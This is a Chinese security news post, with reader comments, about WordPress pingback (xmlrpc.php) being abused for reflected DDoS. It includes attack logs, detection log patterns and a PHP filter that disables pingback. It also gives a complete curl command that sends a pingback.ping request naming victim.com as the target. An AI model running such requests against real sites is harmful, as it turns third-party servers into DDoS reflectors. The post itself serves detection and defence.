超过16W的WordPress网站被用来做DDoS攻击

任何开启了Pingback(默认就开启)的WordPress的站点可以被用来做DDOS攻击其它服务器。

看如下日志:

74.86.132.186 - - [09/Mar/2014:11:05:27 -0400] "GET /?4137049=6431829 HTTP/1.0" 403 0 "-" "WordPress/3.8; http://www.mtbgearreview.com"
121.127.254.2 - - [09/Mar/2014:11:05:27 -0400] "GET /?4758117=5073922 HTTP/1.0" 403 0 "-" "WordPress/3.4.2; http://www.kschunvmo.com" 
217.160.253.21 - - [09/Mar/2014:11:05:27 -0400] "GET /?7190851=6824134 HTTP/1.0" 403 0 "-" "WordPress/3.8.1; http://www.intoxzone.fr" 
193.197.34.216 - - [09/Mar/2014:11:05:27 -0400] "GET /?3162504=9747583 HTTP/1.0" 403 0 "-" "WordPress/2.9.2; http://www.verwaltungmodern.de" 
..

可以发现每次请求还增加了随机数/?3162504=9747583以此来绕过缓存。

测试这种攻击方式只需要一个curl命令就可以了:

$ curl -D -  "www.anywordpresssite.com/xmlrpc.php" -d '<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></param></params></methodCall>'

想要看你自己的网站是否被用来做了攻击可以查看日志当中是否包含类似如下的内容:

93.174.93.72 - - [09/Mar/2014:20:11:34 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:<?xml version=\x221.0\x22 encoding=\x22iso-8859-1\x22?>\x0A<methodCall>\x0A<methodName>pingback.ping</methodName>\x0A<params>\x0A <param>\x0A  <value>\x0A   <string>http://fastbet99.com/?1698491=8940641</string>\x0A  </value>\x0A </param>\x0A <param>\x0A  <value>\x0A   <string>yoursite.com</string>\x0A  </value>\x0A </param>\x0A</params>\x0A</methodCall>\x0A"

94.102.63.238 – - [09/Mar/2014:23:21:01 -0400] "POST /xmlrpc.php HTTP/1.0" 403 4034 "-" "-" "POSTREQUEST:\x0A\x0Apingback.ping\x0A\x0A \x0A \x0A http://www.guttercleanerlondon.co.uk/?7964015=3863899\x0A \x0A \x0A \x0A \x0A yoursite.com\x0A \x0A \x0A\x0A\x0A"

防御此问题的推荐方法需要屏蔽 XML-RPC (pingback) 的功能,WordPress主题中添加如下代码:

add_filter( 'xmlrpc_methods', function( $methods ) {
   unset( $methods['pingback.ping'] );
   return $methods;
} );

[原文地址]

相关内容:

Bitcoin startup BIPS loses $1 million after DDoS heist

Zmap详细用户手册和DDOS的可行性

打造TB级流量DDoS大杀器,超级流量反射放大攻击系统

【逆向爆菊】某DDOS事件逆向追踪。。。有人深挖过吗?

云计算做数据包分析防御DDOS攻击

黑客可利用云开发平台进行DDOS攻击

基于云计算的DDOS攻击缓解方案

迅雷云你伤不起啊,利用迅雷云资源绑架用户,发起大型DDOS攻击

史上最大流量DDOS攻击者被捕

分析:DDos攻击被更有针对性地应用

一段黄色笑话引发的DDoS攻击

US-CERT:DNS服务器配置不当是上周300G DDoS的元凶

基地组织官网遭受海量ddos攻击

DDoS 攻击转移到 IPv6

Asp + 后台服务控制的 DDOS 木马,整套源码下载

浅谈Ddos攻击攻击与防御

T00ls.Net 征集 DDOS、CC 防御解决方案

【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息

电磁风暴超暴力 PHP DDOS 攻击工具 & PHP DDOS 攻击 - 编年史

美国热炒解放军网络战能力 国产神器!军工级暴力DDOS攻击系统!

男子转嫁黑客攻击致金盾网瘫痪 被DDOS请勿乱指域名到政府网

利用P2P网络发动大规模、大流量DDOS攻击

Linux 系统下 DDOS 工具 tfn2k 攻击原理详解

【批处理】批处理、Bat 也能进行 DDOS 攻击?

【Asp代码】用Asp来搞DDOS攻击

DRDoS 反弹DDoS攻击 反弹DDoS攻击 力度远大于分布式DDOS攻击

留言评论(旧系统):

佚名 @ 2014-03-17 11:45:43

Curl命令中的victim.com是被攻击的目标站点吗?

本站回复:

被用来做攻击的:www.anywordpresssite.com/xmlrpc.php 被攻击的网站:http://victim.com

改变命运 @ 2014-03-17 11:46:46

Curl命令中的victim.com是被攻击的目标站点吗?

本站回复:

被用来做攻击的:www.anywordpresssite.com/xmlrpc.php 被攻击的网站:http://victim.com

佚名 @ 2014-03-18 18:05:22

add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['pingback.ping'] ); return $methods; } ); 这个代码是加在functions.php里吗?

本站回复:

添加在WordPress主题中。functions.php文件是一个所有主题都需要配备的文件,很多时候我们可以在里面添加各种函数以实现我们对WordPress的不同需求。

yo~ @ 2014-03-19 20:28:04

这个好! 兄弟们。帮我看看这个 免费100G空间 httP://www.xgkjw.com/free 能安装程序不,多谢了。 (FTP帐户)

本站回复:

这个还要问?人家说明不是写的那么详细么? -_-||| 空间支持:ASP、PHP、Access、MYSQL、Zend、Jmail、FSO、shopex、discuz、phpwind、PHP168、织梦CMS、动易、动网、新云等...

佚名 @ 2014-03-20 21:40:03

添加在WP主题中 这个主题里面也是由很多PHP文件构成的啊 是写在哪个文件里呢?index.php?header.php?

本站回复:

添加在WordPress主题中。functions.php文件是一个所有主题都需要配备的文件,很多时候我们可以在里面添加各种函数以实现我们对WordPress的不同需求。